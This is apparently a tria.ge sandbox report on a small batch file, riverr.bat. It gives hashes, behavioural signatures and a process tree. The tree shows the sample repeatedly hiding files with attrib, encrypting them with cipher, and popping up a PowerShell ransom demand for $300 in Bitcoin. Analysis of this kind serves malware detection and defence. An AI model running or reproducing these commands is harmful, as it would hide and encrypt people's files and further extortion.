Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
126s -
max time network
137s -
platform
windows10-1703_x64 -
resource
win10-20230915-en -
resource tags
arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system -
submitted
06/10/2023, 15:43
Static task
static1
Behavioral task
behavioral1
Sample
riverr.bat
Resource
win10-20230915-en
General
-
Target
riverr.bat
-
Size
1KB
-
MD5
6f925a40f06c74f1a6f89ca3cebb5448
-
SHA1
a298915d2cfa3ba7178142e2d391bc1ab4978f7a
-
SHA256
19c3528c21b085b74d4f5d06f5665beb38d58ff9cd506153d8f158fa904b41ef
-
SHA512
07a85184c83df3aa4fe8abdcf0c9d2fafa020aaf61d54e5f6a8d11fddf10f715cb778c56112d53f9c46538c8441387d906c2b35fe7c6341deacfc85b3ecaeaee
Malware Config
Signatures
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 3364 tasklist.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 3360 powershell.exe 3360 powershell.exe 3360 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3360 powershell.exe Token: SeDebugPrivilege 3364 tasklist.exe -
Suspicious use of WriteProcessMemory 40 IoCs
description pid Process procid_target PID 3748 wrote to memory of 340 3748 cmd.exe 71 PID 3748 wrote to memory of 340 3748 cmd.exe 71 PID 3748 wrote to memory of 4460 3748 cmd.exe 72 PID 3748 wrote to memory of 4460 3748 cmd.exe 72 PID 3748 wrote to memory of 684 3748 cmd.exe 73 PID 3748 wrote to memory of 684 3748 cmd.exe 73 PID 3748 wrote to memory of 1908 3748 cmd.exe 74 PID 3748 wrote to memory of 1908 3748 cmd.exe 74 PID 3748 wrote to memory of 4636 3748 cmd.exe 75 PID 3748 wrote to memory of 4636 3748 cmd.exe 75 PID 3748 wrote to memory of 4148 3748 cmd.exe 76 PID 3748 wrote to memory of 4148 3748 cmd.exe 76 PID 3748 wrote to memory of 1052 3748 cmd.exe 77 PID 3748 wrote to memory of 1052 3748 cmd.exe 77 PID 3748 wrote to memory of 4628 3748 cmd.exe 78 PID 3748 wrote to memory of 4628 3748 cmd.exe 78 PID 3748 wrote to memory of 3256 3748 cmd.exe 79 PID 3748 wrote to memory of 3256 3748 cmd.exe 79 PID 3748 wrote to memory of 5036 3748 cmd.exe 80 PID 3748 wrote to memory of 5036 3748 cmd.exe 80 PID 3748 wrote to memory of 68 3748 cmd.exe 81 PID 3748 wrote to memory of 68 3748 cmd.exe 81 PID 3748 wrote to memory of 2508 3748 cmd.exe 82 PID 3748 wrote to memory of 2508 3748 cmd.exe 82 PID 3748 wrote to memory of 3940 3748 cmd.exe 83 PID 3748 wrote to memory of 3940 3748 cmd.exe 83 PID 3748 wrote to memory of 2424 3748 cmd.exe 84 PID 3748 wrote to memory of 2424 3748 cmd.exe 84 PID 3748 wrote to memory of 2680 3748 cmd.exe 85 PID 3748 wrote to memory of 2680 3748 cmd.exe 85 PID 3748 wrote to memory of 2400 3748 cmd.exe 86 PID 3748 wrote to memory of 2400 3748 cmd.exe 86 PID 3748 wrote to memory of 3360 3748 cmd.exe 87 PID 3748 wrote to memory of 3360 3748 cmd.exe 87 PID 3748 wrote to memory of 3364 3748 cmd.exe 88 PID 3748 wrote to memory of 3364 3748 cmd.exe 88 PID 3748 wrote to memory of 3952 3748 cmd.exe 89 PID 3748 wrote to memory of 3952 3748 cmd.exe 89 PID 3748 wrote to memory of 1480 3748 cmd.exe 91 PID 3748 wrote to memory of 1480 3748 cmd.exe 91 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 684 attrib.exe 4636 attrib.exe 1052 attrib.exe 3256 attrib.exe 68 attrib.exe 3940 attrib.exe 2680 attrib.exe 340 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\riverr.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Windows\system32\attrib.exeattrib +h /s /d2⤵
- Views/modifies file attributes
PID:340
-
-
C:\Windows\system32\cipher.execipher /e /s /a2⤵PID:4460
-
-
C:\Windows\system32\attrib.exeattrib +h /s /d2⤵
- Views/modifies file attributes
PID:684
-
-
C:\Windows\system32\cipher.execipher /e /s /a2⤵PID:1908
-
-
C:\Windows\system32\attrib.exeattrib +h /s /d2⤵
- Views/modifies file attributes
PID:4636
-
-
C:\Windows\system32\cipher.execipher /e /s /a2⤵PID:4148
-
-
C:\Windows\system32\attrib.exeattrib +h /s /d2⤵
- Views/modifies file attributes
PID:1052
-
-
C:\Windows\system32\cipher.execipher /e /s /a2⤵PID:4628
-
-
C:\Windows\system32\attrib.exeattrib +h /s /d2⤵
- Views/modifies file attributes
PID:3256
-
-
C:\Windows\system32\cipher.execipher /e /s /a2⤵PID:5036
-
-
C:\Windows\system32\attrib.exeattrib +h /s /d2⤵
- Views/modifies file attributes
PID:68
-
-
C:\Windows\system32\cipher.execipher /e /s /a2⤵PID:2508
-
-
C:\Windows\system32\attrib.exeattrib +h /s /d2⤵
- Views/modifies file attributes
PID:3940
-
-
C:\Windows\system32\cipher.execipher /e /s /a2⤵PID:2424
-
-
C:\Windows\system32\attrib.exeattrib +h /s /d2⤵
- Views/modifies file attributes
PID:2680
-
-
C:\Windows\system32\cipher.execipher /e /s /a2⤵PID:2400
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "$wshell = New-Object -ComObject WScript.Shell; $wshell.Popup('Your files have been encrypted! To get them back, pay $300 to the following Bitcoin address: 3BKuiDHNSbdCdK8fHTUxCB4GRBiuKUrMzr...', 0, 'Cap or Fact', 16)"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3360
-
-
C:\Windows\system32\tasklist.exetasklist2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3364
-
-
C:\Windows\system32\find.exefind /i "Ransomware"2⤵PID:3952
-
-
C:\Windows\system32\notepad.exenotepad "C:\Users\Admin\Downloads\do not close.txt"2⤵PID:1480
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
111B
MD531a135982c340ddee33732d381694b3c
SHA14b7a551ae6507f2ed1fd6601d35d9e36915fef3b
SHA25671b2cc62a02aee920d4984caf0fdb26fc32b14190d3bac9b0f88fe696708449c
SHA51282344bca5b4ed3eb5eacfb2c79ffc8f799db5daa10e5cb4b89675bca4f251fcd933dd4e2319d11b3456cee08102e5bf5ce0a878a6296fe548ef2ae148287dcf7